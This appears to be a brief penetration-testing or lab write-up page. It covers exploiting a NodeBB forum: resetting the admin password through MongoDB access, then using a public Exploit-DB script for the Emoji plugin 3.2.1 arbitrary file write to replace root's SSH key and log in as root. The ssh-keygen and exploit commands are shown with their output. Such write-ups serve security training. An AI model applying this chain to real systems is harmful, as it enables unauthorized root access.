Exploitation

After gaining admin access to the mongo database I updated the password of the nodebb application

NodeBB Plugin Emoji 3.2.1 - Arbitrary File WriteExploit Database

After generating our own idrsa and replacing it with the root idRsa we were able to log in as root.

ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa
Generating public/private rsa key pair.
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:77ufSzZu/0b3gdzFwZOzihQewkazcg5T4qZ19is9l2M kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|       .o+    . .|
|      . o+oo   * |
|       B.=o o  .=|
|      + O .o   .o|
|     .  S...o + .|
|         ....+.oo|
|         ..++E .+|
|         ..+=o. o|
|          +==o.o.|
+----[SHA256]-----+

python3 /usr/share/exploitdb/exploits/multiple/webapps/49813.py 
[+] Login successful
[+] Emoji plugin is installed
[+] Successfully uploaded file

PreviousMemcached 1.5.6 NextPriv Escalation

Last updated 2 years ago